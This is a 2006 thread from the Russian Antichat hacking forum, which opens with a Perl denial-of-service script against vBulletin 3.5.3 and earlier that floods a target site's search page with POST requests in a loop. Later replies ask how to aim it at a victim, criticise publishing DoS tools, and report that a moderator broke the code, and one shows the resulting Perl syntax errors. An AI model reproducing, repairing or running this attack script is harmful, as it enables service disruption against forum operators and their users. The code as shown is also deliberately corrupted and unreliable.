ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в vBulletin <=3.5.3 DoS
  #1  
Старый 26.01.2006, 16:48
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию Уязвимость в vBulletin <=3.5.3 DoS

DoS атака на vBulletin версии 3.5.3 и ниже
Автор: spic of g00ns <spic <at> g00ns.net>

Код:
#!/usr/bin/per1
##########################################
# vBdos.pl - vBulletin <=3.5.3 Search DoS
#
# Written by spic of g00ns
##########################################
# Contact
# Site: www.g00ns.net and www.g00ns-forum.net
# Email: spic <at> g00ns.net
# IRC: irc.g00ns.net #g00ns
##########################################
# Example
# vBdos.pl www.avbforum.com /vbulletin/
##########################################
# Partially ripped from zod32 of g00ns!
# Sorry, zod! :(
# Excuse the messy code :]
##########################################
# Shoutz to
#
# z3r0, ArYa, uid0, zod32, kutmaster,
# felosi, cijfer, wr0ck,
# and the rest of the crew! ;)
##########################################

use IO::Socket;
$server= $ARGV[0];
$path=$ARGV[1];


while($x != 9999)
{
$post =''search_keywords=spic+of+g00ns+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

$lrg = length $post;


if(!$server||!$path)
{
print "rn";
print "vBulletin DoS by spic of g00nsn";
print "usage: vBdos.pl <host without http> <directory>rn";
exit();
}



my $sock = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;


print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n";
print $sock "Host: $servern";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $servern";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.5n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postn";
close($sock);


syswrite STDOUT,".";

$x++;
}

##########################################

Последний раз редактировалось Azazel; 26.01.2006 в 23:39..
 
Ответить с цитированием

  #2  
Старый 26.01.2006, 19:36
Аватар для milord69
milord69
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564

Репутация: 0
По умолчанию

Если можешь, напиши плиз как ее применять...
 
Ответить с цитированием

  #3  
Старый 26.01.2006, 23:26
Аватар для w4rd3n
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме:
244618

Репутация: -4
По умолчанию

Нах выкладывать дос сплойты теперь всякое ламерье будут форумы досить причем просто так...
 
Ответить с цитированием

  #4  
Старый 26.01.2006, 23:34
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Имхо. И что может быть тупее чем ddos? И нафига? Лучше уж правда, чему - нибудь путному учиться.
PS. Сплойт больше нерабочий.
__________________
Full DNS report
 
Ответить с цитированием

  #5  
Старый 26.01.2006, 23:53
Аватар для •••™NO FEAR™•••
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


По умолчанию

Цитата:
Имхо. И что может быть тупее чем ddos? И нафига? Лучше уж правда, чему - нибудь путному учиться.
PS. Сплойт больше нерабочий.
Тем более, дос атака не катит. В МОА её ваще нельзя использовать...
 
Ответить с цитированием

  #6  
Старый 27.01.2006, 01:37
Аватар для zzipper
zzipper
Новичок
Регистрация: 26.01.2006
Сообщений: 24
Провел на форуме:
173041

Репутация: 0
По умолчанию

Как юзать этот эксплойт? Можно ли ис cmd WinXP и где указывать адрес жертвы?
 
Ответить с цитированием

  #7  
Старый 27.01.2006, 13:29
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию

Azazel спасибо что сплоит нерабочим сделал, сорри что я сразу неподумал. Тему лучше закрыть, или удалить. Спасибо за внимание...
 
Ответить с цитированием

  #8  
Старый 28.01.2006, 14:00
Аватар для kabadayi
kabadayi
Новичок
Регистрация: 17.07.2005
Сообщений: 2
Провел на форуме:
53755

Репутация: 0
По умолчанию

error

Код:
C:\Perl\bin>perl vBdos.pl
Bareword found where operator expected at vBdos.pl line 33, near "''search_keywords"
        (Missing operator before search_keywords?)
Operator or semicolon missing before &search_author at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &search_time at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &search_fields at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &search_cat at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &sort_by at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &sort_dir at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &show_results at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &return_chars at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
String found where operator expected at vBdos.pl line 40, near "print ""
  (Might be a runaway multi-line "" string starting on line 33)
        (Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 40, near "print "rn"
        (Do you need to predeclare print?)
String found where operator expected at vBdos.pl line 41, near "print ""
  (Might be a runaway multi-line "" string starting on line 40)
        (Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 41, near "print "vBulletin"
        (Do you need to predeclare print?)
Bareword found where operator expected at vBdos.pl line 42, near "print "usage"
  (Might be a runaway multi-line "" string starting on line 41)
        (Do you need to predeclare print?)
Bareword found where operator expected at vBdos.pl line 42, near "<directory>rn"
        (Missing operator before rn?)
String found where operator expected at vBdos.pl line 49, near "PeerAddr => ""
  (Might be a runaway multi-line "" string starting on line 42)
        (Missing semicolon on previous line?)
Scalar found where operator expected at vBdos.pl line 49, near "PeerAddr => "$server"
        (Do you need to predeclare PeerAddr?)
String found where operator expected at vBdos.pl line 50, near "PeerPort => ""
  (Might be a runaway multi-line "" string starting on line 49)
        (Missing semicolon on previous line?)
Number found where operator expected at vBdos.pl line 50, near "PeerPort => "80"
        (Do you need to predeclare PeerPort?)
String found where operator expected at vBdos.pl line 51, near "Proto => ""
  (Might be a runaway multi-line "" string starting on line 50)
        (Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 51, near "Proto => "tcp"
        (Do you need to predeclare Proto?)
String found where operator expected at vBdos.pl line 53, near "die ""
  (Might be a runaway multi-line "" string starting on line 51)
        (Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 53, near "die "nThe"
        (Do you need to predeclare die?)
Bareword found where operator expected at vBdos.pl line 53, near "$!n"
        (Missing operator before n?)
String found where operator expected at vBdos.pl line 56, near "print $sock ""
  (Might be a runaway multi-line "" string starting on line 53)
        (Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 56, near "print $sock "POST"
        (Do you need to predeclare print?)
String found where operator expected at vBdos.pl line 56, near "$path".""
        (Missing operator before "."?)
Bareword found where operator expected at vBdos.pl line 56, near ""."search"
        (Missing operator before search?)
Bareword found where operator expected at vBdos.pl line 56, near "1952 HTTP"
        (Missing operator before HTTP?)
Bareword found where operator expected at vBdos.pl line 56, near "1.1n"
        (Missing operator before n?)
String found where operator expected at vBdos.pl line 57, near "print $sock ""
  (Might be a runaway multi-line "" string starting on line 56)
        (Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 57, near "print $sock "Host"
        (Do you need to predeclare print?)
String found where operator expected at vBdos.pl line 58, near "print $sock ""
  (Might be a runaway multi-line "" string starting on line 57)
        (Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 58, near "print $sock "Accept"
        (Do you need to predeclare print?)
Number found where operator expected at vBdos.pl line 58, near "q=0.9,text/plain;q=0.8"
syntax error at vBdos.pl line 33, near "''search_keywords"
Can't find string terminator "=" anywhere before EOF at vBdos.pl line 58.

Последний раз редактировалось kabadayi; 28.01.2006 в 14:09..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимость в vBulletin. Или abbsessionhash вместо полных куков Smart12 Форумы 5 23.02.2006 12:52
Как использовать эту уязвимость в vBulletin 3.5.2? ProblemaT Форумы 6 22.01.2006 16:55
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость в vBulletin 3.5.0 Имба Форумы 0 20.11.2005 03:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ